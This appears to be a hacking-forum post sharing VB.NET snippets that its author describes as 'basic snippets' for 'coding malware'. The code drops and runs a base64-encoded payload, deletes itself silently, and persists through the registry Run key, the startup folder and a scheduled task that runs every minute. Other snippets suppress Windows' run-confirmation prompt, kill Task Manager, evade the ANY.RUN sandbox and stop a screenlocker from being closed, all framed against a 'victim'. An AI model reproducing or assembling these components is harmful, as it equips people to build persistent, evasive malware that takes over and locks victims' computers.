Drop & execute file from Base64:
First, convert your payload to base64 at https://tomeko.net/online_tools/file_to_base64.php
Now the code snippet (requires Imports System.IO ):
Make sure to replace the blank area with your converted string.
Self Deletion:
Does what it says, exits then deletes itself.
Prevent ALT+F4 on form:
This will prevent anyone from using ALT+F4 to close your window. Useful for screenlockers.
Focus form:
Another snippet useful for screenlockers, put this in a timer with a interval, not too low as it completely refocuses the window.
Combined with the Prevent ALT + F4 snippet it will focus over even task manager and the taskbar.
Registry startup:
Sets your program in the registry to run automatically. (Shows in startup tab in task manager)
Copy self to startup:
Copies your program to startup folder. (Shows in startup tab in task manager)
Prevent "Are you sure you want to run this software?"
You should use this with any startup method to make it run without an alert.
Anti Taskmgr:
You should put this in a timer with a low interval, you can also change the "taskmgr" to any .exe name like chrome.
It is also possible to make this end the application when it detects one is started.
For example, changing process.Kill() to Application.Exit() will make the program stop itself when taskmgr is opened.
(Good persistence with scheduled tasks if the victim is to open taskmgr often and is paranoid.)
Detect ANY.RUN sandbox:
Detects ANY.RUN sandbox, if detected it will close. Can cause false-positives with completely default setup installations.
Scheduled tasks:
This will schedule your program to start every minute at any startup. You can also change "Example" to any name you want.
If you prefer C# instead of VB.net you can try to convert code here: https://converter.telerik.com/
Run into errors? I can try to fix it for you.
These are basic snippets i've taken/made over the years when experimenting with coding malware. Enjoy.
First, convert your payload to base64 at https://tomeko.net/online_tools/file_to_base64.php
Now the code snippet (requires Imports System.IO ):
Code:
Dim byt As Byte() = Convert.FromBase64String("")
IO.File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe", byt)
Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe")
Self Deletion:
Code:
Dim piDestruct As ProcessStartInfo = New ProcessStartInfo()
piDestruct.Arguments = "/C choice /C Y /N /D Y /T 3 & Del " _
& Application.ExecutablePath
piDestruct.WindowStyle = ProcessWindowStyle.Hidden
piDestruct.CreateNoWindow = True
piDestruct.FileName = "cmd.exe"
Process.Start(piDestruct)
Application.Exit()
Prevent ALT+F4 on form:
Code:
Protected Overrides ReadOnly Property CreateParams() As CreateParams
Get
Dim cp As CreateParams = MyBase.CreateParams
Const CS_NOCLOSE As Integer = &H200
cp.ClassStyle = cp.ClassStyle Or CS_NOCLOSE
Return cp
End Get
End Property
Focus form:
Code:
Me.Activate()
Me.Focus()
Combined with the Prevent ALT + F4 snippet it will focus over even task manager and the taskbar.
Registry startup:
Code:
My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)
Sets your program in the registry to run automatically. (Shows in startup tab in task manager)
Copy self to startup:
Code:
If IO.File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe") Then
''Not doing anything here, but you can if you want.
Else
IO.File.Copy(Application.ExecutablePath(), Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe")
End If
Copies your program to startup folder. (Shows in startup tab in task manager)
Prevent "Are you sure you want to run this software?"
Code:
Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User)
Anti Taskmgr:
Code:
Dim process As Process
For Each process In Process.GetProcessesByName("taskmgr")
Try
process.Kill()
Catch ex As Exception
End Try
Next
It is also possible to make this end the application when it detects one is started.
For example, changing process.Kill() to Application.Exit() will make the program stop itself when taskmgr is opened.
(Good persistence with scheduled tasks if the victim is to open taskmgr often and is paranoid.)
Detect ANY.RUN sandbox:
Code:
If Environment.UserName = "admin" And System.Windows.Forms.SystemInformation.ComputerName = "USER-PC" Then
''ANY.RUN was detected.
Me.Close()
Else
''ANY.RUN was not detected here.
End If
Scheduled tasks:
Code:
Interaction.Shell(("schtasks /delete /tn Example /f"), AppWinStyle.Hide, True, &H1388)
Interaction.Shell(("schtasks /create /sc minute /mo 1 /tn Example /tr " & AppDomain.CurrentDomain.BaseDirectory & IO.Path.GetFileName(Application.ExecutablePath)), AppWinStyle.Hide, True, &H1388)
If you prefer C# instead of VB.net you can try to convert code here: https://converter.telerik.com/
Run into errors? I can try to fix it for you.
These are basic snippets i've taken/made over the years when experimenting with coding malware. Enjoy.